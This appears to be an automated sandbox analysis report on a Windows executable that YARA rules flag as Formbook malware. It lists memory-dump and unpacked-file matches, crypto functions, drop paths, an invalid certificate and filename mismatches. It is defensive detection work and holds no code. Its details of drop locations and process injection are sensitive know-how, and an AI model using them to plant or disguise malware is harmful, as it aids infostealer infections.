- Source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions

Detected potential crypto function

- Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 0_3_02239291
- Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 0_3_02238690
- Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 0_3_02238698
- Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 0_3_02243D9C
- Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 0_3_0222B340
- Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 0_3_0222B348
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04CFD466
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C4841F
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D025DD
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C4D5E0
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D01D55
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D02D07
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C30D20
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D02EF7
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04CFD616
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C56E30
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D01FF1
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D028EC
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C4B090
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C620A0
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D020A8
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04CF1002
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D0E824
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C3F900
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C54120
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D022AE
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04CFDBD2
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C6EBB0
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D02B28
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_1042E81B
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_10411026
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_10411030
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_1042D8D7
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_1042D166
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_1042E360
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_10412D87
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_10412D90
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_10419E2B
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_10419E30
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_1042D779
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_10412FB0
- Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 7_3_02219291
- Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 7_3_02218690
- Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 7_3_02218698
- Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 7_3_02223D9C
- Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 7_3_0220B340
- Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 7_3_0220B348
- Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 12_3_02689291
- Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 12_3_02688698
- Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 12_3_02688690
- Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 12_3_02693D9C
- Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 12_3_0267B340
- Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 12_3_0267B348
Found potential string decryption / allocating functions

- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 04C3B150 appears 35 times

PE / OLE file has an invalid certificate

- Source: Ijxlcmh_Signed_.exe Static PE information: invalid certificate

PE file contains strange resources

- Source: Ijxlcmh_Signed_.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
- Source: Ijxlcmh_Signed_.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
- Source: Ijxlcmh_Signed_.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
- Source: Ijxlcmh_Signed_.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
- Source: Ijxldrv.exe.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
- Source: Ijxldrv.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
- Source: Ijxldrv.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
- Source: Ijxldrv.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

- Source: Ijxlcmh_Signed_.exe, 00000000.00000002.253344471.0000000003810000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Ijxlcmh_Signed_.exe
- Source: Ijxlcmh_Signed_.exe, 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameICb.exe, vs Ijxlcmh_Signed_.exe
- Source: Ijxlcmh_Signed_.exe, 00000000.00000002.253367376.0000000003990000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Ijxlcmh_Signed_.exe
- Source: Ijxlcmh_Signed_.exe Binary or memory string: OriginalFilenameICb.exe, vs Ijxlcmh_Signed_.exe

Tries to load missing DLLs